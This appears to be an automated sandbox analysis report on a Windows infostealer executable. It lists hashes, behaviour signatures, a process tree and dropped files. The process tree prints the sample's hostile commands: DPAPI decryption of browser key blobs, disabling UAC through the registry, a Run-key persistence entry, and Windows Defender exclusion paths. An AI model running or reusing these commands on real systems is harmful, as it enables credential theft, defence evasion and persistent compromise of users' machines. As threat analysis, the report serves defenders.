Analysis

  • max time kernel
    135s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 02:47

General

  • Target

    b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

  • Size

    37.2MB

  • MD5

    a92c1499dbcfff3bc5b57853f6219eec

  • SHA1

    b04810bcad458b6771d4f8430033a6e608a1324b

  • SHA256

    b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2

  • SHA512

    3d762d9b27c74a040ecbd413e48088429855ef0cdd3c11605339f880220a76f6725fcd47c6c0ecb85f63688c6cc20bf5a37b54568155fda84c5c1f4d46b1af3e

  • SSDEEP

    393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg396l+ZArYsFRlrN2:R3on1HvSzxAMN3FZArYs+PvAX7OZ0i

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 12 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
    "C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP"
            5⤵
              PID:3940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4584
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          PID:4044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic diskdrive get serialnumber
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3456
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\system32\reg.exe
          reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
          3⤵
          • Adds Run key to start application
          PID:4624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic baseboard get serialnumber
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
        2⤵
          PID:2384
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:916
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic path win32_computersystemproduct get uuid
            3⤵
              PID:1860
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1684
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Description,PNPDeviceID
              3⤵
                PID:3876
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4564
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic memorychip get serialnumber
                3⤵
                  PID:516
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                2⤵
                  PID:3652
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic csproduct get uuid
                    3⤵
                      PID:4700
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                    2⤵
                      PID:1216
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic cpu get processorid
                        3⤵
                          PID:2024
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                        2⤵
                          PID:856
                          • C:\Windows\system32\getmac.exe
                            getmac /NH
                            3⤵
                              PID:3512
                          • C:\Users\Admin\AppData\Local\Temp\python-installer.exe
                            C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:568
                            • C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
                              "C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:1540
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
                            2⤵
                              PID:4172
                          • C:\Windows\system32\msiexec.exe
                            C:\Windows\system32\msiexec.exe /V
                            1⤵
                            • Blocklisted process makes network request
                            • Enumerates connected drives
                            • Drops file in Windows directory
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4492

                          Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Config.Msi\e57de3d.rbs

                                  Filesize

                                  8KB

                                  MD5

                                  48a46d6b43040711c0339edd00fc86a5

                                  SHA1

                                  f9216314a251fa6d35004b4c4092fd533259f0ee

                                  SHA256

                                  4241d8b5549ca50e0072e81c527f094f37f3e7f467654fe73d794b20c12e9fb4

                                  SHA512

                                  4d84d96dfa0f365ef905c519301110428d162d43c0b0dabfe3525c44f2a4f516dbc267070957ce6bbda441b5e33aa75f97c864a1dda097fd533d5916d0f680b5

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                  SHA1

                                  445bf1b07223a04f8a159581a3d37d630273010f

                                  SHA256

                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                  SHA512

                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  e89c193840c8fb53fc3de104b1c4b092

                                  SHA1

                                  8b41b6a392780e48cc33e673cf4412080c42981e

                                  SHA256

                                  920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

                                  SHA512

                                  865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  e86a2f4d6dec82df96431112380a87e6

                                  SHA1

                                  2dc61fae82770528bee4fe5733a8ac3396012e79

                                  SHA256

                                  dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

                                  SHA512

                                  5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  7bde4b527f6c280b58f471b90da7fac8

                                  SHA1

                                  d5b685a260a01dd33f8732c8cbc976b2989f6188

                                  SHA256

                                  38ad355760e10eabaa9a9f00436975e1c1e1323e383412abdb108f2980cc7911

                                  SHA512

                                  c2d95bf41e99e07f77a49be23bc143a785a5544474cf6c40e4d93b89d48e25afb36964368f3c5aedb5d253cb3debe5ed4b08ce3e8d955d0758cfb744f3535a6c

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  fa62682ae5c4db5ff5c8081be40619a3

                                  SHA1

                                  c8492e65565a2bf0913cf501fbd4109e22f32ef3

                                  SHA256

                                  044ae72c1d6bd0d35731d675cad25040163bc0d06970772bd7b04e79b7b7618a

                                  SHA512

                                  fa940f723775420022e5f58e276d8f5ddba51dbe17a7227ab349a34498e687bb1159d0615a17a68d1a5416cc0c103951bdb05856dd984856703f16733bd8b5fd

                                • C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

                                  Filesize

                                  7.1MB

                                  MD5

                                  f6ddadd0d817ce569e202e57863ae919

                                  SHA1

                                  3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

                                  SHA256

                                  63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

                                  SHA512

                                  7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

                                • C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

                                  Filesize

                                  3.4MB

                                  MD5

                                  fd7e13f2c36fe528afc7a05892b34695

                                  SHA1

                                  14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

                                  SHA256

                                  2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

                                  SHA512

                                  7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

                                • C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

                                  Filesize

                                  724KB

                                  MD5

                                  2db9e147e0fd938c6d3c1e7cf6942496

                                  SHA1

                                  e4333f4334b5df6f88958e03ad18b54e64a1331f

                                  SHA256

                                  9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab

                                  SHA512

                                  4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

                                • C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

                                  Filesize

                                  1.9MB

                                  MD5

                                  d4c1f834f30032f220409a17e0f688cd

                                  SHA1

                                  61dc90b164c3797456a8ed775b353a087054fd0f

                                  SHA256

                                  675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

                                  SHA512

                                  b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\BackupStart.csv

                                  Filesize

                                  636KB

                                  MD5

                                  6babe9070e590172a9797afb604cfb90

                                  SHA1

                                  c8aac29f9220e399a829fb02b07c66396481bc82

                                  SHA256

                                  72bf9fb0dfb94a02559b2be4519178ceb1bb63b837b7cb0a7d8192154a0622ad

                                  SHA512

                                  5190ebedd44ed2e31dbba51d12d911ec56102c8b3853698bad46a1c6e9608b336588aa1ee91954c237fc4bb1e58418d1f280e41737e4f1d24eb58b1bfa935548

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UnlockBackup.txt

                                  Filesize

                                  1.1MB

                                  MD5

                                  be2290f73ddcedef156d4155202f3c20

                                  SHA1

                                  ea98970dbf35bd3b1b556abdfb09660f1cc08ec9

                                  SHA256

                                  eb980ff4233547e5488beb4e58685c2998ef0fd1909674c82ff2285a0b83c567

                                  SHA512

                                  05d0d0d6df69e311f73c1d7cfb35279c2b696105cbdc115f43f98466c5cf030d2be31d76104b70456933f2b03bac74b1294dac8937f922190747f88953e686a9

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UseBackup.xlsx

                                  Filesize

                                  11KB

                                  MD5

                                  aad09e5816b356fce7964daaec14d955

                                  SHA1

                                  1594e6629cdfd7978c48f98456d219e19be227d2

                                  SHA256

                                  6ae6c5e94701c9f0bb9930b2c0723e85d1449689c274d607095a6ac9710acacc

                                  SHA512

                                  064995bf6774f00ba509caaf8a0179f8c1ff431f273c24aaf5c7f48b62a040156f5517347ecd95fde712cf187f6b9221c90607b18fe18cf3b597921eebc005bc

                                • C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1

                                  Filesize

                                  380B

                                  MD5

                                  cbb9a56c9c8d7c3494b508934ace0b98

                                  SHA1

                                  e76539db673cc1751864166494d4d3d1761cb117

                                  SHA256

                                  027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

                                  SHA512

                                  f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

                                • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_000_core_JustForMe.log

                                  Filesize

                                  1KB

                                  MD5

                                  9f190f62aace0367c91a959cc11ea7db

                                  SHA1

                                  df84e4a53a2d563fee16f1aadb04972ea4307a8e

                                  SHA256

                                  154b0f66e674f0280637d37b66c4b89e5bfd8ecd81441bf9d0f567266c39288d

                                  SHA512

                                  55b7040a6d86b5b4a0a6fe06071a712242b9ace0f29431621ec81c382e4f52a35bb79b6d995a7e19c9770436e5531db03475f5d4331eeb4f4d355a2175e6955e

                                • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_001_exe_JustForMe.log

                                  Filesize

                                  1KB

                                  MD5

                                  ff82da4f8a0c5548cc732f210c8b52b8

                                  SHA1

                                  2e05b46beae3f3ae7cbdfa43b7f2cac790b014e6

                                  SHA256

                                  8a102c85ee623ee6710178fa0af65611b668758ccb3314c0a9ce141aa6929652

                                  SHA512

                                  57ea4ddfd570c901c0e751cdc7dbf91a0767086baf3e3d069d79e0e02de94078cd6ae89ee434c773b45c12fb044b494242e8e4262de8af589e4f9af7f6854b83

                                • C:\Users\Admin\AppData\Local\Temp\RESA875.tmp

                                  Filesize

                                  1KB

                                  MD5

                                  9bd689e5278ac26e84b0e7866908535b

                                  SHA1

                                  e59041d291a32e63674f343f4ba130dd4e19ca5c

                                  SHA256

                                  f26252720fdb4f39511608db9e63c7139fa4f43420e9441723be477256fd546e

                                  SHA512

                                  133f4a86d10edd31426b1cea778470f66c4abf252ae602e7af124393c6880844f36368a7fd36a12be6004e03a1c452e6f21129bde0a25fba5ad73db9a084dd53

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5nes5k.x1a.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.dll

                                  Filesize

                                  3KB

                                  MD5

                                  31f88152d1e3349c4902bce5e8c3b3c7

                                  SHA1

                                  a976dad2cc8e6d0963282666dece8feda511cde6

                                  SHA256

                                  f1c2017af6fd652ec105f50b0ac205b9640847306dcc1793737cca00ddae6368

                                  SHA512

                                  98ec2fb0fce497cab8c0b4647fecf680ff799a70c58399f71a571f2334373f5edf277017deade4c9f2b391188d2b388d855b96fb384188b7968c938bc9ff2207

                                • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

                                  Filesize

                                  1.8MB

                                  MD5

                                  66a65322c9d362a23cf3d3f7735d5430

                                  SHA1

                                  ed59f3e4b0b16b759b866ef7293d26a1512b952e

                                  SHA256

                                  f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

                                  SHA512

                                  0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

                                • C:\Users\Admin\AppData\Local\Temp\python-installer.exe

                                  Filesize

                                  25.3MB

                                  MD5

                                  d8548aa7609a762ba66f62eeb2ca862d

                                  SHA1

                                  2eb85b73cab52693d3a27446b7de1c300cc05655

                                  SHA256

                                  5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

                                  SHA512

                                  37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

                                • C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe

                                  Filesize

                                  858KB

                                  MD5

                                  931227a65a32cebf1c10a99655ad7bbd

                                  SHA1

                                  1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

                                  SHA256

                                  1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

                                  SHA512

                                  0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\PythonBA.dll

                                  Filesize

                                  675KB

                                  MD5

                                  8c8e5a5ca0483abdc6ad6ef22c73b5d2

                                  SHA1

                                  9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

                                  SHA256

                                  edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

                                  SHA512

                                  861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\SideBar.png

                                  Filesize

